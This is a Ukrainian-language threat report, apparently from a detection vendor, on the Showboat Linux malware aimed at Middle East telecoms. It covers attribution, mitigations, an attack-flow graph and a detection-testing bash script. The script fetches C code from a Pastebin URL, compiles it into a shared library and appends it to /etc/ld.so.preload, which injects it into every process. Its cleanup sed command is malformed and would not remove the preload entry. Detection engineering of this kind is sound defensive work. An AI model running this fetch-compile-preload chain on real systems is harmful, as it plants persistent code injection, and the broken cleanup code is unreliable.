SOC Prime Bias: Високий

19 Jun 2026 07:48 UTC
newspaper icon picussecurity.com

Шкідливе програмне забезпечення Showboat націлене на телекомунікаційні компанії Близького Сходу з 2022 року

Author Photo
SOC Prime Team linkedin icon Стежити
Шкідливе програмне забезпечення Showboat націлене на телекомунікаційні компанії Близького Сходу з 2022 року
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Резюме

Showboat — це модульна платформа післяексплуатації Linux, створена для довкілля AMD x86-64. Активна з середини 2022 року, її розроблено для збереження тихого, довготривалого доступу всередині заражених мереж. Шкідливе ПЗ використовує передові методи ухилення, зокрема XOR-шифрування та зловживання динамічним лінкером для приховування шкідливих процесів.

Розслідування

Розслідування привело командно-контрольну інфраструктуру до Ченду, Китаю, що разом із спостереженими тактиками, методиками та процедурами свідчить про зв’язки з загрозовими акторами, що підтримуються КНР. Технічний аналіз показав, що шкідливе ПЗ залежить від жорстко закодованого XOR-ключа для дешифрування своєї конфігурації та зловживає ld.so.preload для досягнення непомітності на заражених системах.

Пом’якшення

Захисники повинні стежити за несанкціонованими змінами до /etc/ld.so.preload та підозрілим використанням gcc компілятора на продукційних системах Linux. Також рекомендується розгортати моніторинг мережі, здатний ідентифікувати поведінку при маячкуванні, навіть якщо час випадковий, та використовувати моніторинг цілісності для критичних системних бібліотек.

Відповідь

Якщо виявлена активність Showboat, негайно ізолюйте заражені системи Linux від мережі, щоб зупинити подальший командно-контрольний трафік. Виконайте судову комп’ютерну експертизу пам’яті для ідентифікації вбудованих спільних об’єктів і проведіть повну перевірку налаштувань системи та запланованих завдань, щоб підтвердити, що всі механізми збереження були видалені.

graph TB %% Визначення класів classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware_entity fill:#ff9999 classDef network fill:#99ff99 %% Визначення вузлів %% Етап 1: Початкова конфігурація action_decryption[“<b>Дія</b> – <b>T1027: Обфусковані файли або інформація</b><br/>Отримує зашифровану конфігурацію через XOR<br/>з використанням вбудованого ключа: look me, AV!<br/>Ціль: telecom.webredirect[.]org”] class action_decryption action %% Етап 2: C2 та ексфільтрація malware_showboat[“<b>Шкідливе ПЗ</b> – <b>Showboat</b><br/>Агент життєвого циклу після компрометації”] class malware_showboat malware_entity action_beaconing[“<b>Дія</b> – <b>T1071: Протокол прикладного рівня</b><br/>Встановлює C2-з’єднання через heartbeat-маяки<br/>Використовує випадкові інтервали очікування для обходу виявлення”] class action_beaconing action action_exfiltration[“<b>Дія</b> – <b>T1029: Запланована передача</b><br/>Об’єднує інформацію про хост і знімки екрана у JSON<br/>Шифрує та кодує дані у Base64<br/>Використовує стеганографію у PNG-полях для приховування”] class action_exfiltration action %% Етап 3: Приховування та закріплення action_fetch_source[“<b>Дія</b> – <b>T1105: Передача інструментів у систему</b><br/>Отримує C-файл ukpkmkk.c<br/>Джерело: URL-адреса Pastebin”] class action_fetch_source action action_compile[“<b>Дія</b> – <b>T1059: Інтерпретатор команд і скриптів</b><br/>Компілює ukpkmkk.c локально на машині жертви<br/>Створює шкідливу спільну бібліотеку”] class action_compile action action_hijack[“<b>Дія</b> – <b>T1574.006: Перехоплення потоку виконання: Dynamic Linker Hijacking</b><br/>Використовує механізм ld.so.preload<br/>Впроваджує /tmp/ukpkmkk.so у процеси”] class action_hijack action action_stealth[“<b>Дія</b> – <b>T1564: Приховування артефактів</b><br/>Перехоплює системні виклики, такі як readdir()<br/>Приховує процеси від ps і top за допомогою списку фільтрації”] class action_stealth action %% З’єднання malware_showboat –>|виконує| action_decryption action_decryption –>|встановлює| action_beaconing action_beaconing –>|екcфільтрує_дані| action_exfiltration action_exfiltration –>|запускає_команду_приховування| action_fetch_source action_fetch_source –>|призводить_до| action_compile action_compile –>|створює_бібліотеку| action_hijack action_hijack –>|досягає| action_stealth %% Фінальний потік action_stealth -.->|підтримує| malware_showboat

Потік атаки

Виконання симуляції

Передумова: Перевірка телеметрії та базового показника перед запуском має бути пройдена.

Обґрунтування: Цей розділ детально описує точне виконання методики атакуючого (TTP), призначене для активації правила виявлення. Команди та наратив МАЮТЬ прямо відображати ідентифіковані TTP та націлені на генерацію тієї точної телеметрії, яку очікує логіка виявлення. Абстрактні або несумісні приклади можуть призвести до неправильної діагностики.

  • Опис атаки & Команди: Атакуючий намагається встановити постійне перехоплення системних викликів. Вони починають з завантаження шкідливого вихідного файлу C з необробленого URL Pastebin за допомогою curl. Як тільки завантажено, вони використовують gcc з прапорцями -shared and -fPIC для компіляції вихідного коду у спільний об’єктний файл під назвою malicious.so. Нарешті, вони намагаються досягти стійкості, додаючи шлях до цієї бібліотеки у /etc/ld.so.preload. Ця послідовність покликана вбудувати шкідливу бібліотеку у кожен процес на системі.

  • Скрипт тесту регресій:

    #!/bin/bash
# Симуляція TTP шкідливого ПЗ Showboat

# 1. Симуляція отримання C вихідного файлу з Pastebin
# Примітка: Використання реального необробленого посилання pastebin (можливе імітація строки)
echo "Створення симуляції завантаження с пейстбіну..."
echo 'void __attribute__((constructor)) init() {}' > fake_malware.c

# Ця команда активує частину 'selection_fetch' правила
curl -s https://pastebin.com/raw/example_id -o fake_malware.c

# 2. Симуляція компіляції спільного об'єкта
# Ця команда активує частину 'selection_compile' правила
# (selection_fetch І selection_compile)
gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c

# 3. Симуляція модифікації ld.so.preload
# Ця команда активує частину 'selection_preload' правила
echo "/tmp/malicious.so" | sudo tee -a /etc/ld.so.preload

echo "Симуляція завершена. Перевірте SIEM для отримання попереджень."

  • Команди очищення:

    #!/bin/bash
# Очищення артефактів симуляції

# Видалити шкідливу бібліотеку та джерело
sudo rm -f /tmp/malicious.so
rm -f fake_malware.c

# Видалити запис з ld.so.preload (Необхідна обережність)
# Ця команда sed видаляє рядок, що містить /tmp/malicious.so
sudo sed -i '//tmp/malicious.so/d' /etc/ld.so.preload

echo "Очищення завершено."

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно